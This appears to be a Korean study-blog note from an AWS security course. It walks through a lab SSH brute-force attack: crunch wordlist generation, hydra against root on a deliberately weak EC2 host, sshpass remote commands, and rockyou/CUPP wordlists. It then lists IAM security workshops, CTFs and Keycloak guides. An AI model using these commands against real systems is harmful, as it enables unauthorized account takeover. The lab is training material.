암호 관련 정보 습득 : hydra - 링크 , Crunch - 링크 , rockyou - 링크 , Cupp - 링크
1
웹서버 = 암호 취약하게 일부러 12qw로 만듬
# 관리자 확인
whoami
# SSH 접속 로그 출력
more /var/log/secure
grep Invalid /var/log/secure
# root 계정의 암호 설정 - 취약한 암호이며 실습 후 바로 해당 EC2를 삭제 할 것
passwd
New password: 12qw
Retype new password: 12qw
...
# 실시간 로그 출력
tail -f /var/log/secure
1
임의 암호 파일을 만든다.
# crunch tool 로 사전 파일 생성 - 참고링크 참고영상
cd /root/crunch-3.6
./crunch 4 4 12qw -o 4chars.txt
최소4, 최대4 , 12qw 를 가지고 만들어라. , 출력파일
# 사전 파일 확인, 256개의 암호 생성
more 4chars.txt
more 4chars.txt |wc -l
256
2
[Attacker EC2]
히드라 = 무차별 대입 공격을 해준다.
# Hydra tool 로 SSH Brute force attack 시도
hydra -h
hydra -l root -P 4chars.txt -t 10 -f -V ssh://10.0.0.10
...
[22][ssh] host: 10.0.0.10 login: root password: 12qw
…
암호 찾아냄!!!!
# 리모트 명령 실행
sshpass -p '12qw' ssh -o StrictHostKeyChecking=no root@10.0.0.10 hostname
sshpass -p '12qw' ssh -o StrictHostKeyChecking=no root@10.0.0.10 ip -c addr
3
[Attacker EC2]
# crunch tool 로 사전 파일 생성 - 참고링크 참고영상
cd /root/crunch-3.6
./crunch 4 4 12qw -o 4chars.txt
# 사전 파일 확인, 256개의 암호 생성
more 4chars.txt
more 4chars.txt |wc -l
256
# Hydra tool 로 SSH Brute force attack 시도
hydra -h
hydra -l root -P 4chars.txt -t 10 -f -V ssh://10.0.0.10
...
[22][ssh] host: 10.0.0.10 login: root password: 12qw
...
# 리모트 명령 실행
sshpass -p '12qw' ssh -o StrictHostKeyChecking=no root@10.0.0.10 hostname
sshpass -p '12qw' ssh -o StrictHostKeyChecking=no root@10.0.0.10 ip -c addr
4
Cupp 공격 툴
# 사전 파일 획득
## (옵션) 구글링 - 최애(자주 쓰는) 암호 Top 10/100 리스트, Kali Linux 등등
## (옵션) Rockyou 대용량 사전 파일 - 일천사백만개 암호 리스트 > 필요한 부분만 별도의 파일로 만들어서 사용
cd
more /root/rockyou.txt
less /root/rockyou.txt
wc -l /root/rockyou.txt
14344394
grep password /root/rockyou.txt
grep cisco /root/rockyou.txt
grep -F '***' /root/rockyou.txt
## (옵션) Cupp tool 개인 정보 기반 암호 리스트 생성 - 참고링크
python3 /root/cupp.py -i → 뒤 질문은 전부 N 하자
생성된 파일 확인
more ~
1
Unauthorized IAM Credential Use - Simulation and Detection (공격과 발견 실습 포함) - 링크 ← 미국 동부(버지니아 리전) 실습
2
Cryptominer Based Security Events - Simulation and Detection (공격과 발견 실습 포함) - 링크 ← 미국 동부(버지니아 리전) 실습
3
CTF & Challenge
IAM Challenge
https://bigiamchallenge.com/challenge/1
r00tz CTF
on AWS
https://r00tz-ctf.awssecworkshops.com/
AWS challenge
4
RSA Conference
Destroying Long-Lived Cloud Credentials with Workload Identity Federation - 링크 → 고정/장기 키 사용 최소화
5
classmethod : 그림 설명 잘되어 있음, 한국어로 번역 후 볼 것! - 링크
2023
IAM 사용자가 AWS 콘솔에 임시 액세스를 제어하는 방법 - 링크
2022
IAM 사용자가 속한 IAM 그룹에 연결된 IAM 정책 목록을 AWS CLI에서 검색 - 링크
AWS의 스위치 롤용 CLI 툴 「AWSume」의 소개 - 링크 https://awsu.me/
IAM 컨트롤 플레인 및 데이터 플레인 설명 - 링크
AWS IAM에서 장애가 발생하면 어떻게 됩니까? - 링크Docs
Jump 계정 환경에서 IP 주소 제한 - 링크
[한글] AWS CLI로 IAM Role 생성해 보기 - 링크
AWS 재입문 블로그 릴레이 2022 AWS IAM편 - 링크
IAM User의 MFA 관련 IAM 정책 예시 - 링크
IAM Role의 100 연쇄 - 링크
IAM 역할의 PassRole과 AssumeRole - 링크
6
AWS Workshop[AWS Workshop] (KR) Data Perimeter Workshop : 데이터 경계 제어 구축 - 링크 ⇒ 2개의 AWS 계정이 반드시 필요
7
실습 시나리오 4개 확인 - 링크
8
AWS SAML + Keycloak
Keycloak 구축 및 AWS SAML 연동 -
Keycloak 소개 및 연동 -
AWS에서 Keycloak 기반 서비스 인증 체제 구축 -
[AWS Blog] Configure Keycloak on Amazon Elastic Kubernetes Service (Amazon EKS) using Terraform -
[AWS Blog] Federate Amazon QuickSight access with open-source identity provider Keycloak -
[AWS Blog] Configure SAML federation for Amazon OpenSearch Serverless with AWS IAM Identity Center -
1
AWS 보안 점검 및 보안 설정 가이드(관련 법령과 함께 따라하기 쉽게 실습 정리됨) -
https://rogue-gouda-f87.notion.site/AWS-de0b5749d03b464ea2e555cba3974d0b
링크 , 필자 블로그 - 링크
2
IAM 자격 증명 기반 정책의 예
https://docs.aws.amazon.com/ko_kr/IAM/latest/UserGuide/access_policies_examples.html
https://brunch.co.kr/@topasvga/3430
https://brunch.co.kr/@topasvga/3445
주말 CloudNet 스터디 내용 참고하여 정리한 부분입니다.
https://gasidaseo.notion.site/gasidaseo/CloudNet-Blog-c9dfa44a27ff431dafdd2edacc8a1863
감사합니다.